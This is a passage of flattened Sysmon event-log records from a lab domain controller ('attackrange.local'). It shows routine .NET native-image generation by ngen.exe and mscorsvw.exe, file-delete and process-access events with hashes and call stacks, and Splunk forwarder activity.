T\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.920{4DB9351A-A28B-60D3-0606-00000000CF01}2096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DD0U02O4AF\System.Workflow.Runtime.ni.dll.auxMD5=E7B6A683ED0241BE80DDA9DEA401B682,SHA256=3DACF86D10554F6FB9957A1CC979C89C7D32116122F5B857958417556286740A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.920{4DB9351A-A28B-60D3-0606-00000000CF01}2096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DD0U02O4AF\System.Workflow.Runtime.ni.dllMD5=267B104D45A49842D965D274CF277AE0,SHA256=E1209902A5926CFE1D6D6BD2A87E28C7B951C07BB4090F06389D6FCF89E07626,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.795{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0606-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.780{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0606-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.780{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0606-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.780{4DB9351A-A28B-60D3-0506-00000000CF01}6620NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6BSZLS9RNB\System.Workflow.ComponentModel.ni.dll.auxMD5=95C00ACCAD117BBAA0A64EE4938D2BBF,SHA256=3A4F02E8505417E6EC6E56BD3E9D39F69117F2D6B1C9BB89C273C4106B1CA924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.764{4DB9351A-A28B-60D3-0506-00000000CF01}6620NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6BSZLS9RNB\System.Workflow.ComponentModel.ni.dllMD5=42ECBE33694CD4BF9FD9F8898064513E,SHA256=D902FA35D40F6F1B9C3A62F74B8882E6F975CE08A91A1BA7857D36BB9432C233,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.608{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC1586F09B258571D2F09BBEBE829F85,SHA256=444446AC7A410B5E1A791180F49487948CAF1F144F4950D6811DE8B43B502554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.498{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F93DEC262CD741B8B7C22F5653DE89C5,SHA256=26FE23A9F3C69250AF15D5BCD9EDFA18A68BE17A2DF71D37D271AA9B5813268C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.420{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0506-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.405{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0506-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.405{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0506-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.405{4DB9351A-A28B-60D3-0406-00000000CF01}4100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Q1FWXRHTZF\System.Workflow.Activities.ni.dll.auxMD5=ED836697EE0D02FC79D9EC056ADB6EDC,SHA256=74B238E6FC6ECBDA9F49DC0CB2D9320090602C6FFFFFA31256725D7D428AD1E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.405{4DB9351A-A28B-60D3-0406-00000000CF01}4100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Q1FWXRHTZF\System.Workflow.Activities.ni.dllMD5=807A156CC172AC1D811E75353A55E410,SHA256=FA32595A243D09FC20FA6D7B62AC0F1E3823BFA4BF7EF947B8A6A7ECB1CD226A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.280{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28C79828AE576C1BB48A9EA344321B9F,SHA256=49FFDAE2BD6C5E519C12542043F10B632C105E20B49234677ABEF973DA5D21A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.202{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0406-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.186{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0406-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.186{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0406-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.186{4DB9351A-A28B-60D3-0306-00000000CF01}6480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R11SBCAKQW\System.Windows.Presentation.ni.dll.auxMD5=9FAA968F128E5C9A925CF2CD6286CB9F,SHA256=46E1B4475212AD5DED55AD82AC901CA8B7E12E2AC3BD817AC7284004F4C92972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.186{4DB9351A-A28B-60D3-0306-00000000CF01}6480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R11SBCAKQW\System.Windows.Presentation.ni.dllMD5=7C4400FB33835C3687A4FDB28FD48E70,SHA256=2C6B1142C3FED7D3B9D64D4D54024ACAE41AD81BA13280251BD1053A009BAF62,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.170{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0306-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.155{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0306-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.155{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0306-00000000CF01}6480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.139{4DB9351A-A28B-60D3-0206-00000000CF01}5848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\85EKJF2CAD\System.AddIn.ni.dll.auxMD5=EB561902CB0E4E3BC8CE557F96B06CDB,SHA256=47B4B123FA2BCB075CA884AC8841A16AF6A3319FFCDFB8AF2A8D7F4968CDF9F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.139{4DB9351A-A28B-60D3-0206-00000000CF01}5848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\85EKJF2CAD\System.AddIn.ni.dllMD5=B6D4C0EA407A66BEFE66D36F7BE2A226,SHA256=49C79E67581102B1932DD8EDB561E7BCF4F343ECBEA8CFF7EE46478769EC9397,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28B-60D3-0206-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.109{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28B-60D3-0206-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.092{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28B-60D3-0206-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.092{4DB9351A-A28B-60D3-0106-00000000CF01}2212NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6C4AG5XL0Q\System.Windows.Input.Manipulations.ni.dll.auxMD5=95E4C80D4A885A768D0AB7CC9B149C97,SHA256=4A2C18AF675765CD318917B09E7683054A9135449D43A8468199B3CB6470487E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.092{4DB9351A-A28B-60D3-0106-00000000CF01}2212NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6C4AG5XL0Q\System.Windows.Input.Manipulations.ni.dllMD5=AB79455ABF9585659E0A7AC4CE500D49,SHA256=F2A7D464C5C081A7C4B601380E165FDA879CB78F614F645D22519B93227DE5C6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 